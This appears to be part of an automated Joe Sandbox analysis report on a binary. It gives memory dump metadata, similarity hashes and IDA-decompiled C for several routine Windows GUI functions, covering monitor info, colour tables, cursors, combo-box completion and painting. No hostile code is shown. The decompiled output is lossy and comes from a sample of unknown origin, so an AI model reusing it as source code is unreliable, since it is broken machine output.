      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: System$Metrics$AddressInfoParametersProclstrcpy
      • String ID: DISPLAY$GetMonitorInfoA
      • API String ID: 2545840971-1370492664
      • Opcode ID: 29a3c3dcd37244793022be55274b4c5bacfbbf78f9a2e6dba6a3527bf5f5976b
      • Instruction ID: c4531b7892aace24af7ecb9b7627fcd333702b64d3c0460514fd221cf2fb85df
      • Opcode Fuzzy Hash: 29a3c3dcd37244793022be55274b4c5bacfbbf78f9a2e6dba6a3527bf5f5976b
      • Instruction Fuzzy Hash: 691103F2B013249FE7608F60AC45BA7B7E8EB06310F40053FF84597251D3B4A980CBA9
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 47%
      			E0042DA10(intOrPtr _a4, intOrPtr* _a8) {
      				void _v20;
      				void* __ebx;
      				void* __esi;
      				void* __ebp;
      				void* _t23;
      				int _t24;
      				intOrPtr _t26;
      				intOrPtr _t27;
      				intOrPtr* _t29;
      				intOrPtr* _t31;
      
      				_t29 = _a8;
      				_t27 = _a4;
      				if( *0x490932 != 0) {
      					_t24 = 0;
      					if(_t27 == 0x12340042 && _t29 != 0 &&  *_t29 >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
      						 *((intOrPtr*)(_t29 + 4)) = 0;
      						 *((intOrPtr*)(_t29 + 8)) = 0;
      						 *((intOrPtr*)(_t29 + 0xc)) = GetSystemMetrics(0);
      						 *((intOrPtr*)(_t29 + 0x10)) = GetSystemMetrics(1);
      						asm("movsd");
      						asm("movsd");
      						asm("movsd");
      						asm("movsd");
      						_t31 = _t29;
      						 *(_t31 + 0x24) = 1;
      						if( *_t31 >= 0x4c) {
      							_push("DISPLAY");
      							_push(_t31 + 0x28);
      							L00407238();
      						}
      						_t24 = 1;
      					}
      				} else {
      					_t26 =  *0x49091c; // 0x42da10
      					 *0x49091c = E0042D52C(6, _t23, "GetMonitorInfoW", _t26, _t29);
      					_t24 =  *0x49091c(_t27, _t29);
      				}
      				return _t24;
      			}

      APIs
      • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 0042DA68
      • GetSystemMetrics.USER32 ref: 0042DA7D
      • GetSystemMetrics.USER32 ref: 0042DA88
      • lstrcpy.KERNEL32(?,DISPLAY), ref: 0042DAB2
        • Part of subcall function 0042D52C: GetProcAddress.KERNEL32(75BA0000,00000000), ref: 0042D5B0
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: System$Metrics$AddressInfoParametersProclstrcpy
      • String ID: DISPLAY$GetMonitorInfoW
      • API String ID: 2545840971-2774842281
      • Opcode ID: 2d0478f93acefdd48fe366142f8ac2afbb39f6b184ed0ea24dd71a4a287b9d6a
      • Instruction ID: 828a15328a13e0b06e063ffd0ea0ad04c27ff685f243d406d5660353592df8f2
      • Opcode Fuzzy Hash: 2d0478f93acefdd48fe366142f8ac2afbb39f6b184ed0ea24dd71a4a287b9d6a
      • Instruction Fuzzy Hash: EF11E1B1B053249FE3208F61AC84FA7B7A8EF25310F40453BEC4597251D2B4A8018BA9
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 67%
      			E00429F3C(int __eax, void* __ecx, intOrPtr __edx) {
      				intOrPtr _v8;
      				int _v12;
      				struct HDC__* _v16;
      				void* _v20;
      				struct tagRGBQUAD _v1044;
      				int _t16;
      				struct HDC__* _t18;
      				int _t31;
      				int _t34;
      				intOrPtr _t41;
      				void* _t43;
      				void* _t46;
      				void* _t48;
      				intOrPtr _t49;
      
      				_t16 = __eax;
      				_t46 = _t48;
      				_t49 = _t48 + 0xfffffbf0;
      				_v8 = __edx;
      				_t43 = __eax;
      				if(__eax == 0 ||  *((short*)(__ecx + 0x26)) > 8) {
      					L4:
      					return _t16;
      				} else {
      					_t16 = E00427698(_v8, 0xff,  &_v1044);
      					_t34 = _t16;
      					if(_t34 == 0) {
      						goto L4;
      					} else {
      						_push(0);
      						L00407658();
      						_v12 = _t16;
      						_t18 = _v12;
      						_push(_t18);
      						L00407280();
      						_v16 = _t18;
      						_v20 = SelectObject(_v16, _t43);
      						_push(_t46);
      						_push(0x429feb);
      						_push( *[fs:eax]);
      						 *[fs:eax] = _t49;
      						SetDIBColorTable(_v16, 0, _t34,  &_v1044);
      						_pop(_t41);
      						 *[fs:eax] = _t41;
      						_push(0x429ff2);
      						SelectObject(_v16, _v20);
      						DeleteDC(_v16);
      						_t31 = _v12;
      						_push(_t31);
      						_push(0);
      						L004078C0();
      						return _t31;
      					}
      				}
      			}

      APIs
        • Part of subcall function 00427698: GetObjectA.GDI32(?,00000004), ref: 004276AF
        • Part of subcall function 00427698: 73BEAEA0.GDI32(?,00000000,?,?,?,00000004,?,000000FF,?,?,?,00429F72), ref: 004276D2
      • 73BEAC50.USER32(00000000), ref: 00429F7A
      • 73BEA590.GDI32(?,00000000), ref: 00429F86
      • SelectObject.GDI32(?), ref: 00429F93
      • SetDIBColorTable.GDI32(?,00000000,00000000,?,00000000,00429FEB,?,?,?,?,00000000), ref: 00429FB7
      • SelectObject.GDI32(?,?), ref: 00429FD1
      • DeleteDC.GDI32(?), ref: 00429FDA
      • 73BEB380.USER32(00000000,?,?,?,?,00429FF2,?,00000000,00429FEB,?,?,?,?,00000000), ref: 00429FE5
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Object$Select$A590B380ColorDeleteTable
      • String ID:
      • API String ID: 980243606-0
      • Opcode ID: ad183c3c4a2d4bb77d4b85db5fdfec1cb44b56cf705b8352cfdfa95108daa70f
      • Instruction ID: 96f81490edaf8d694098af7e0e1b67720fe3675b80c09903467de2b1af394022
      • Opcode Fuzzy Hash: ad183c3c4a2d4bb77d4b85db5fdfec1cb44b56cf705b8352cfdfa95108daa70f
      • Instruction Fuzzy Hash: 70116671E042296FDB50EFE9DC91EAEB7BCEB08314F8144BAF504E7281D6789D4087A5
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 94%
      			E004625B4(long __eax, void* __ecx, short __edx) {
      				struct tagPOINT _v24;
      				long _t7;
      				long _t12;
      				long _t19;
      				void* _t21;
      				struct HWND__* _t27;
      				short _t28;
      				void* _t30;
      				struct tagPOINT* _t31;
      
      				_t21 = __ecx;
      				_t7 = __eax;
      				_t31 = _t30 + 0xfffffff8;
      				_t28 = __edx;
      				_t19 = __eax;
      				_t1 = _t19 + 0x44; // 0x0
      				if(__edx ==  *_t1) {
      					L6:
      					 *((intOrPtr*)(_t19 + 0x48)) =  *((intOrPtr*)(_t19 + 0x48)) + 1;
      				} else {
      					 *((short*)(__eax + 0x44)) = __edx;
      					if(__edx != 0) {
      						L5:
      						_t7 = SetCursor(E00462578(_t19, _t21, _t28));
      						goto L6;
      					} else {
      						GetCursorPos(_t31);
      						_push(_v24.y);
      						_t27 = WindowFromPoint(_v24);
      						if(_t27 == 0) {
      							goto L5;
      						} else {
      							_t12 = GetWindowThreadProcessId(_t27, 0);
      							if(_t12 != GetCurrentThreadId()) {
      								goto L5;
      							} else {
      								_t7 = SendMessageA(_t27, 0x20, _t27, E00407A10(SendMessageA(_t27, 0x84, 0, E00407A9C(_t31, _t21)), 0x200));
      							}
      						}
      					}
      				}
      				return _t7;
      			}

      APIs
      • GetCursorPos.USER32 ref: 004625CF
      • WindowFromPoint.USER32(?,?), ref: 004625DC
      • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004625EA
      • GetCurrentThreadId.KERNEL32 ref: 004625F1
      • SendMessageA.USER32 ref: 0046260A
      • SendMessageA.USER32 ref: 00462621
      • SetCursor.USER32(00000000), ref: 00462633
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
      • String ID:
      • API String ID: 1770779139-0
      • Opcode ID: a4ead231e3d2669afbcd7b906a23320af280f2f02c897461a8b6a490a5b5ccc5
      • Instruction ID: a46696d9f44d158db03efb16f552d160a917e20c6f04fbdd23bb764f2b308580
      • Opcode Fuzzy Hash: a4ead231e3d2669afbcd7b906a23320af280f2f02c897461a8b6a490a5b5ccc5
      • Instruction Fuzzy Hash: 7D01D832B4AB0039D62136754D86B7F2558CB817A5F50053FB504B61C3F97DAC01536F
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 100%
      			E0040CB24(void* __edx, void* __edi, void* __fp0) {
      				void _v1024;
      				char _v1088;
      				long _v1092;
      				void* _t12;
      				char* _t14;
      				intOrPtr _t16;
      				intOrPtr _t18;
      				intOrPtr _t24;
      				long _t32;
      
      				_t40 = __edx;
      				E0040C98C(_t12,  &_v1024, __edx, __fp0, 0x400);
      				_t14 =  *0x48f8c0; // 0x490048
      				if( *_t14 == 0) {
      					_t16 =  *0x48f618; // 0x407dbc
      					_t9 = _t16 + 4; // 0xffeb
      					_t18 =  *0x490664; // 0x400000
      					LoadStringA(E00405EC0(_t18,  &_v1024, _t40),  *_t9,  &_v1088, 0x40);
      					return MessageBoxA(0,  &_v1024,  &_v1088, 0x2010);
      				}
      				_t24 =  *0x48f678; // 0x490218
      				E00402C58(E004032DC(_t24));
      				CharToOemA( &_v1024,  &_v1024);
      				_t32 = E00409A44( &_v1024, __edi);
      				WriteFile(GetStdHandle(0xfffffff4),  &_v1024, _t32,  &_v1092, 0);
      				return WriteFile(GetStdHandle(0xfffffff4), 0x40cbe8, 2,  &_v1092, 0);
      			}

      APIs
        • Part of subcall function 0040C98C: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040C9A8
        • Part of subcall function 0040C98C: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040C9CC
        • Part of subcall function 0040C98C: GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040C9E7
        • Part of subcall function 0040C98C: LoadStringA.USER32 ref: 0040CA8B
      • CharToOemA.USER32 ref: 0040CB5B
      • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 0040CB78
      • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0040CB7E
      • GetStdHandle.KERNEL32(000000F4,0040CBE8,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0040CB93
      • WriteFile.KERNEL32(00000000,000000F4,0040CBE8,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0040CB99
      • LoadStringA.USER32 ref: 0040CBBB
      • MessageBoxA.USER32 ref: 0040CBD1
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
      • Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
      • String ID:
      • API String ID: 185507032-0
      • Opcode ID: a8eb735539d66ca88a6210c5c44812f1f39e77f3cc58d2b897131e8db65d26c3
      • Instruction ID: 7731975ad474b23c23bc64afc69e40a4413cdd0c5d23dd247e2cef9b0bc7fe10
      • Opcode Fuzzy Hash: a8eb735539d66ca88a6210c5c44812f1f39e77f3cc58d2b897131e8db65d26c3
      • Instruction Fuzzy Hash: 9C1142B2548200BAD200F7A5DC86F9B77EC5B44704F504A3FB244F60E1DA78F944876A
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 87%
      			E00437AD0(intOrPtr __eax, void* __ebx, signed int* __edx, void* __edi, void* __esi) {
      				intOrPtr _v8;
      				signed int _v12;
      				char _v16;
      				char _v20;
      				char _v24;
      				void* _v44;
      				struct tagMSG _v52;
      				char _v56;
      				char _v60;
      				char _v64;
      				char _v68;
      				char _v72;
      				char _v76;
      				intOrPtr _v80;
      				intOrPtr _v84;
      				char _v88;
      				char _v92;
      				long _t115;
      				void* _t119;
      				intOrPtr _t122;
      				void* _t130;
      				void* _t133;
      				void* _t139;
      				signed int _t148;
      				void* _t152;
      				long _t167;
      				void* _t177;
      				intOrPtr _t178;
      				signed int _t180;
      				intOrPtr _t184;
      				signed int _t186;
      				signed int _t195;
      				int _t199;
      				signed int _t205;
      				signed int _t220;
      				signed int* _t232;
      				void* _t233;
      				intOrPtr _t251;
      				intOrPtr _t256;
      				void* _t284;
      				signed int _t293;
      				intOrPtr _t295;
      				intOrPtr _t296;
      
      				_t291 = __esi;
      				_t288 = __edi;
      				_t295 = _t296;
      				_t233 = 0xb;
      				do {
      					_push(0);
      					_push(0);
      					_t233 = _t233 - 1;
      				} while (_t233 != 0);
      				_push(__ebx);
      				_push(__esi);
      				_push(__edi);
      				_t232 = __edx;
      				_v8 = __eax;
      				_push(_t295);
      				_push(0x437e88);
      				_push( *[fs:eax]);
      				 *[fs:eax] = _t296;
      				E0044A13C(_v8, __edx);
      				if( *((char*)(_v8 + 0x268)) == 0) {
      					L40:
      					_pop(_t251);
      					 *[fs:eax] = _t251;
      					_push(0x437e8f);
      					E00404A64( &_v92, 5);
      					E00404A40( &_v72);
      					E00404A64( &_v68, 2);
      					E00404A64( &_v60, 2);
      					return E00404A64( &_v24, 2);
      				} else {
      					if( *((intOrPtr*)(_v8 + 0x276)) - 2 >= 0) {
      						_t115 = GetTickCount();
      						_t256 = _v8;
      						__eflags = _t115 -  *((intOrPtr*)(_t256 + 0x26c)) - 0x1f4;
      						if(_t115 -  *((intOrPtr*)(_t256 + 0x26c)) >= 0x1f4) {
      							__eflags = _v8 + 0x270;
      							E00404A40(_v8 + 0x270);
      						}
      						 *((intOrPtr*)(_v8 + 0x26c)) = GetTickCount();
      					} else {
      						E00444928(_v8,  &_v56);
      						E00404A94(_v8 + 0x270, _v56);
      					}
      					_t119 =  *_t232 - 8;
      					if(_t119 == 0) {
      						__eflags = E004379DC( &_v12,  &_v16, _t295);
      						if(__eflags == 0) {
      							_t122 = _v8;
      							__eflags =  *((intOrPtr*)(_t122 + 0x276)) - 2;
      							if( *((intOrPtr*)(_t122 + 0x276)) - 2 >= 0) {
      								while(1) {
      									L24:
      									_t130 = E0040D5B0( *(_v8 + 0x270), E00404D00( *(_v8 + 0x270)));
      									__eflags = _t130 - 2;
      									if(_t130 != 2) {
      										break;
      									}
      									_t133 = E00404D00( *(_v8 + 0x270));
      									__eflags = _v8 + 0x270;
      									E00404FA0(_v8 + 0x270, 1, _t133);
      								}
      								_t139 = E00404D00( *(_v8 + 0x270));
      								__eflags = _v8 + 0x270;
      								E00404FA0(_v8 + 0x270, 1, _t139);
      								L26:
      								 *_t232 = 0;
      								E00403DF8(_v8, __eflags);
      								goto L40;
      							}
      							E00444928(_v8,  &_v60);
      							_t148 = E00404D00(_v60);
      							__eflags = _t148;
      							if(_t148 <= 0) {
      								goto L24;
      							}
      							E00444928(_v8,  &_v24);
      							_t293 = _v12;
      							while(1) {
      								_t152 = E0040D5B0(_v24, _t293);
      								__eflags = _t152 - 2;
      								if(_t152 != 2) {
      									break;
      								}
      								_t293 = _t293 - 1;
      								__eflags = _t293;
      							}
      							E00404F60(_v24, _t293 - 1, 1,  &_v20);
      							SendMessageA(E0044B158(_v8), 0x14e, 0xffffffff, 0);
      							E00404F60(_v24, 0x7fffffff, _v16 + 1,  &_v68);
      							E00404D4C( &_v64, _v68, _v20);
      							E00444958(_v8, _t232, _v64, _t293);
      							_t167 = E00407ABC();
      							SendMessageA(E0044B158(_v8), 0x142, 0, _t167);
      							E00444928(_v8,  &_v72);
      							E00404A94(_v8 + 0x270, _v72);
      							goto L26;
      						}
      						E00437A08(_t232, _t291, __eflags, _t295);
      						goto L26;
      					} else {
      						_t177 = _t119 - 1;
      						if(_t177 == 0) {
      							_t178 = _v8;
      							__eflags =  *((char*)(_t178 + 0x269));
      							if( *((char*)(_t178 + 0x269)) != 0) {
      								_t180 = E00436A04(_v8);
      								__eflags = _t180;
      								if(_t180 != 0) {
      									E00436A28(_v8, 0);
      								}
      							}
      						} else {
      							if(_t177 != 0x12) {
      								_t184 = _v8;
      								__eflags =  *((char*)(_t184 + 0x269));
      								if( *((char*)(_t184 + 0x269)) != 0) {
      									_t220 = E00436A04(_v8);
      									__eflags = _t220;
      									if(_t220 == 0) {
      										E00436A28(_v8, 1);
      									}
      								}
      								_t186 = E004379DC( &_v12,  &_v16, _t295);
      								__eflags = _t186;
      								if(_t186 == 0) {
      									E00404C28();
      									E00404D4C( &_v24, _v84,  *(_v8 + 0x270));
      								} else {
      									E00404F60( *(_v8 + 0x270), _v12, 1,  &_v76);
      									_push(_v76);
      									E00404C28();
      									_pop(_t284);
      									E00404D4C( &_v24, _v80, _t284);
      								}
      								__eflags =  *_t232 & 0x000000ff;
      								asm("bt [edx], eax");
      								if(( *_t232 & 0x000000ff) >= 0) {
      									_t195 = E00437E98(_v8, _t232, _v24, _t288, _t291);
      									__eflags = _t195;
      									if(_t195 != 0) {
      										 *_t232 = 0;
      									}
      								} else {
      									_t199 = PeekMessageA( &_v52, E0044B158(_v8), 0, 0, 0);
      									__eflags = _t199;
      									if(_t199 != 0) {
      										__eflags = _v52.message - 0x102;
      										if(_v52.message == 0x102) {
      											E00404C28();
      											E00404D4C( &_v88, _v92, _v24);
      											_t205 = E00437E98(_v8, _t232, _v88, _t288, _t291);
      											__eflags = _t205;
      											if(_t205 != 0) {
      												PeekMessageA( &_v52, E0044B158(_v8), 0, 0, 1);
      												 *_t232 = 0;
      											}
      										}
      									}
      								}
      							}
      						}
      						goto L40;
      					}
      				}
      			}

      APIs
      • GetTickCount.KERNEL32 ref: 00437B39
      • GetTickCount.KERNEL32 ref: 00437B5B
        • Part of subcall function 004379DC: SendMessageA.USER32 ref: 004379F8
      • SendMessageA.USER32 ref: 00437C3D
      • SendMessageA.USER32 ref: 00437C8D
        • Part of subcall function 00437A08: SendMessageA.USER32 ref: 00437A49
        • Part of subcall function 00437A08: SendMessageA.USER32 ref: 00437A75
        • Part of subcall function 00437A08: SendMessageA.USER32 ref: 00437AA9
      • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00437DD5
      • PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 00437E22
        • Part of subcall function 00436A04: SendMessageA.USER32 ref: 00436A18
        • Part of subcall function 00436A28: SendMessageA.USER32 ref: 00436A45
        • Part of subcall function 00436A28: InvalidateRect.USER32(00000000,000000FF,000000FF), ref: 00436A62
      Memory Dump Source
      • Source File: 00000001.00000002.247515532.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.247508525.0000000000400000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.247589229.000000000048E000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.247592785.000000000048F000.00000008.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.247599155.0000000000490000.00000004.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.247605132.0000000000496000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.247775744.0000000000541000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.247789384.000000000054E000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.247812972.0000000000562000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.247820645.000000000056A000.00000002.00000001.01000000.00000004.sdmp
• Associated: 00000001.00000002.247838365.0000000000575000.00000002.00000001.01000000.00000004.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Message$Send$CountPeekTick$InvalidateRect
      • String ID:
      • API String ID: 2065907832-0
      • Opcode ID: e16dcc9782ee38b830b6a9d5659059337ec8e212a6b64cf1a4c0ab16ddffc2e9
      • Instruction ID: 2726e0fa0c6476143346c5794e3006218aad42d862a8c31501772db6f17a8fe3
      • Opcode Fuzzy Hash: e16dcc9782ee38b830b6a9d5659059337ec8e212a6b64cf1a4c0ab16ddffc2e9
      • Instruction Fuzzy Hash: 11B18670A04109DFDB10EBA5C986BDEB3B5AF49304F2450B6F444BB396C738AE06DB59
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 89%
      			E0045E044(intOrPtr* __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
      				intOrPtr* _v8;
      				intOrPtr* _v12;
      				struct HDC__* _v16;
      				struct tagPAINTSTRUCT _v80;
      				struct tagRECT _v96;
      				struct tagRECT _v112;
      				signed int _v116;
      				long _v120;
      				void* __ebp;
      				void* _t68;
      				void* _t94;
      				struct HBRUSH__* _t97;
      				intOrPtr _t105;
      				void* _t118;
      				void* _t127;
      				intOrPtr _t140;
      				intOrPtr _t146;
      				void* _t147;
      				void* _t148;
      				void* _t150;
      				void* _t152;
      				intOrPtr _t153;
      
      				_t148 = __esi;
      				_t147 = __edi;
      				_t138 = __edx;
      				_t127 = __ebx;
      				_t150 = _t152;
      				_t153 = _t152 + 0xffffff8c;
      				_v12 = __edx;
      				_v8 = __eax;
      				_t68 =  *_v12 - 0xf;
      				if(_t68 == 0) {
      					_v16 =  *(_v12 + 4);
      					if(_v16 == 0) {
      						 *(_v12 + 4) = BeginPaint( *(_v8 + 0x254),  &_v80);
      					}
      					_push(_t150);
      					_push(0x45e212);
      					_push( *[fs:eax]);
      					 *[fs:eax] = _t153;
      					if(_v16 == 0) {
      						GetWindowRect( *(_v8 + 0x254),  &_v96);
      						E0044446C(_v8,  &_v120,  &_v96);
      						_v96.left = _v120;
      						_v96.top = _v116;
      						E00443264( *(_v12 + 4),  ~(_v96.top),  ~(_v96.left));
      					}
      					E00448DE4(_v8, _t127, _v12, _t147, _t148);
      					_pop(_t140);
      					 *[fs:eax] = _t140;
      					_push(0x45e220);
      					if(_v16 == 0) {
      						return EndPaint( *(_v8 + 0x254),  &_v80);
      					}
      					return 0;
      				} else {
      					_t94 = _t68 - 5;
      					if(_t94 == 0) {
      						_t97 = E0042632C( *((intOrPtr*)(_v8 + 0x170)));
      						 *((intOrPtr*)( *_v8 + 0x44))();
      						FillRect( *(_v12 + 4),  &_v112, _t97);
      						if( *((char*)(_v8 + 0x22f)) == 2 &&  *(_v8 + 0x254) != 0) {
      							GetClientRect( *(_v8 + 0x254),  &_v96);
      							FillRect( *(_v12 + 4),  &_v96, E0042632C( *((intOrPtr*)(_v8 + 0x170))));
      						}
      						_t105 = _v12;
      						 *((intOrPtr*)(_t105 + 0xc)) = 1;
      					} else {
      						_t118 = _t94 - 0x2b;
      						if(_t118 == 0) {
      							E0045DFB8(_t150);
      							_t105 = _v8;
      							if( *((char*)(_t105 + 0x22f)) == 2) {
      								if(E0045E4E0(_v8) == 0 || E0045E004(_t138, _t150) == 0) {
      									_t146 = 1;
      								} else {
      									_t146 = 0;
      								}
      								_t105 = E0045B2B8( *(_v8 + 0x254), _t146);
      							}
      						} else {
      							if(_t118 != 0x45) {
      								_t105 = E0045DFB8(_t150);
      							} else {
      								E0045DFB8(_t150);
      								_t105 = _v12;
      								if( *((intOrPtr*)(_t105 + 0xc)) == 1) {
      									_t105 = _v12;
      									 *((intOrPtr*)(_t105 + 0xc)) = 0xffffffff;
      								}
      							}
      						}
      					}
      					return _t105;
      				}
      			}

      APIs
      • FillRect.USER32 ref: 0045E0BD
      • GetClientRect.USER32(00000000,?), ref: 0045E0E8
      • FillRect.USER32 ref: 0045E107
        • Part of subcall function 0045DFB8: CallWindowProcA.USER32 ref: 0045DFF2
      • BeginPaint.USER32(?,?), ref: 0045E17F
      • GetWindowRect.USER32 ref: 0045E1AC
      • EndPaint.USER32(?,?,0045E220), ref: 0045E20C
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_obedience.jbxd
      Similarity
      • API ID: Rect$FillPaintWindow$BeginCallClientProc
      • String ID:
      • API String ID: 901200654-0
      • Opcode ID: 257ffd95361531f35d55efac916bb8ae1f7098fa6ab1771df41d818bd5355525
      • Instruction ID: acc5bc2361441916d8b75bc5a61d49b13a3cbd7431ce75e5604705cb6672fe87
      • Opcode Fuzzy Hash: 257ffd95361531f35d55efac916bb8ae1f7098fa6ab1771df41d818bd5355525
      • Instruction Fuzzy Hash: 33510A31904508EFCB04DFAAD589E9DB7F9AF08315F5485A6F804AB356C738AE49CB08
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 68%
